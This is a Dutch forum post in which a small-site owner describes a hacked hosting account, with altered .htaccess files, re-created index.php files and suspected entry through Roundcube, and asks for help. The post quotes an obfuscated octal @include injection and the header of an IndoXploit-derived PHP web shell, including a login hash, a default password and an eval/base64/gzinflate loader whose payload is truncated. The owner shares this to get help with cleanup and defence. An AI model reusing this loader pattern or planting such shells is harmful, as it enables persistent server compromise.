Context:
hosting bij Versio, voornamelijk om een paar pagina's (fotoboekje, receptenpagina) te hosten.
inclusief een aantal subdomeinen die verwijzingen doen via .htaccess files naar andere pagina's
Mijn vraag
Gisteren merkte ik dat mijn subdomein met .htaccess verwijzingen niet meer werkte, de dag ervoor werkte die nog wel goed.
Ik zag dat op al mijn subfolders de .htaccess file was aangepast (met als doel om ongeveer alles te blokkeren) en dat er een hoop vreemde .php files zijn toegevoegd en dat aan het begin van de bestaande index.php files een stukje file was toegevoegd.
Acties:
- wachtwoord aangepast en two-factor geactiveerd
- alles opgekuisd en teruggezet naar hoe het stond (hopelijk alles...)
Vandaag zie ik dat er terug index.php files zijn aangemaakt die ik gisteren verwijderd heb. (.htaccess files waren wel onaangepast)
Gisteren ook versio gecontacteerd en hun antwoord is: ja wij hebben toegang tot uw files, maar neen wij doen niets automatisch.
Prefix die toegevoegd is aan de bestaande index.php (of als niet bestaande, dan is dit de enigste code wat erin zit:
(als je tussen de cijfers leest dan staat er daar een verwijzing naar folders uit mijn hosting, specifiek naar roundcube, de combinatie van cijfers en letters is altijd anders, maar het verwijst wel naar zelfde bestand)
Ook volgende file heb ik gevonden:
Wat ik nu nog ga doen: roundcube updaten naar laatste versie (want de verwijzingen van de toevoegingen zijn altijd naar daar)
Iemand enig idee wat er mis is?
hosting bij Versio, voornamelijk om een paar pagina's (fotoboekje, receptenpagina) te hosten.
inclusief een aantal subdomeinen die verwijzingen doen via .htaccess files naar andere pagina's
Mijn vraag
Gisteren merkte ik dat mijn subdomein met .htaccess verwijzingen niet meer werkte, de dag ervoor werkte die nog wel goed.
Ik zag dat op al mijn subfolders de .htaccess file was aangepast (met als doel om ongeveer alles te blokkeren) en dat er een hoop vreemde .php files zijn toegevoegd en dat aan het begin van de bestaande index.php files een stukje file was toegevoegd.
Acties:
- wachtwoord aangepast en two-factor geactiveerd
- alles opgekuisd en teruggezet naar hoe het stond (hopelijk alles...)
Vandaag zie ik dat er terug index.php files zijn aangemaakt die ik gisteren verwijderd heb. (.htaccess files waren wel onaangepast)
Gisteren ook versio gecontacteerd en hun antwoord is: ja wij hebben toegang tot uw files, maar neen wij doen niets automatisch.
Prefix die toegevoegd is aan de bestaande index.php (of als niet bestaande, dan is dit de enigste code wat erin zit:
(als je tussen de cijfers leest dan staat er daar een verwijzing naar folders uit mijn hosting, specifiek naar roundcube, de combinatie van cijfers en letters is altijd anders, maar het verwijst wel naar zelfde bestand)
code:
1
2
3
4
5
6
| <?php /*e0304*/ @include "\057ho\155e/\142ar\164dc\17017\060/d\157ma\151ns\057 (.... knip ...) /*e0304*/ |
Ook volgende file heb ik gevonden:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| <?php ############################################################################### //Thanks Buat Yg Udh Support Buat Shell Ini //Shell Recoded From IndoXploit Shell //Thanks For Ashura - MA_h4ck0601 - ScarleT7 - Cyber Merah Putih //Special Thanks For My Bee :* ############################################################################### $auth_user = "29"; $auth_pass = "e5057bd08dc553311081fd1107f05d7a"; //default : Mercury2911 $Kidsjamannow= "7X35e9rIsujPme+b/6Gj8Q32jc1zO4nXGeyAaoy ... (knip, want heel lang) ... NOX3f8H"; eval(str_rot13(gzinflate(str_rot13(base64_decode(($Kidsjamannow)))))); |
Wat ik nu nog ga doen: roundcube updaten naar laatste versie (want de verwijzingen van de toevoegingen zijn altijd naar daar)
Iemand enig idee wat er mis is?
/u/298857/crop6471d9676d431.png?f=community)
:strip_exif()/u/47664/afx_hax.gif?f=community)
:strip_icc():strip_exif()/u/96648/shakira.jpg?f=community)
/u/336312/crop6638bf772fb60_cropped.png?f=community)